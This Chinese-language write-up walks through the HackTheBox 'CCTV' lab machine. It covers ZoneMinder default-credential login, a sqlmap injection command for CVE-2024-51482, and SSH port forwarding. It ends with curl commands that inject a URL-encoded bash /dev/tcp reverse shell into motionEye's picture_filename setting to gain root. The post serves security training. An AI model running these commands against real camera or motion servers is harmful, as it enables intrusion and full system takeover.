文章总结： 本文详述HackTheBoxCCTV靶机渗透过程。利用ZoneMinder默认凭据登录，结合CVE-2024-51482通过SQL注入获取凭据。SSH登入后分析进程发现motionEye服务，经端口转发访问本地接口，利用配置注入漏洞反弹Shell实现提权并获取Root。文章涵盖信息收集、漏洞利用及提权全流程，实战性强。 综合评分： 88 文章分类： 渗透测试,实战经验,CTF

HackTheBox Season 10 CCTV 难度:Easy

原创

信益安研究院 信益安研究院

信益安信息安全研究院

2026年3月8日 18:03 湖北

CCTV

nmap：

添加进hosts文件访问web端：

利用ZoneMinder的默认凭据admin;admin进行登录：

登录后访问API显示了三个用户：

superadmin
mark
admin

通过版本找到了cve(CVE-2024-51482)：

github找个exp或者sqlmap直接打：（这里使用的sqlmap）

sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=mhhkvfaufgcmtq6gjhvrc7spo2" \
-p tid --dbs --batch          //数据包爆出来了爆表爆出来了爆字段，由于是时间盲注，结果爆的很慢，所以我们跳过爆的部分。

最终我们通过爆破得到mark:opensesame

SSH上去：

在ssh里面查看进程 ：

通过分析我们得知：
127.0.0.1:8765  — motionEye 0.43.1b4 (web UI)
127.0.0.1:7999  — motion HTTP control interface
127.0.0.1:9081  — motion MJPEG stream
127.0.0.1:3306  — MySQL
127.0.0.1:8554  — RTSP server

查看 systemd 服务文件：

这个文件说明了 motionEye 服务的启动方式：

使用 root 权限运行

启动时加载配置文件：/etc/motioneye/motioneye.conf

查看 motion 服务配置：

1 管理员账户信息：
系统存在 Web 管理界面认证机制，并且管理员密码被存储在配置文件中

建立一个隧道转发：

ssh -L 8765:127.0.0.1:8765 [email protected]

此时在kali访问的就是目标的127.0.0.1：

查看页面源代码发现版本信息：

提权：

开启图片输出：

curl "http://127.0.0.1:7999/1/config/set?picture_output=on"

注入反弹shell：

curl "http://127.0.0.1:7999/1/config/set?picture_filename=%24%28bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.x.x%2F4444%200%3E%261%27%29"

触发motion服务：

curl "http://127.0.0.1:7999/1/config/set?emulate_motion=on"

成功监听拿到root以及user的flag：

最后

🌟感谢您看到这里，您的支持与关注，是我们持续输出内容的最大动力

🌟欢迎在season 10 赛季期间进群交流

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：信益安信息安全研究院 信益安研究院 信益安研究院《HackTheBox Season 10 CCTV 难度:Easy》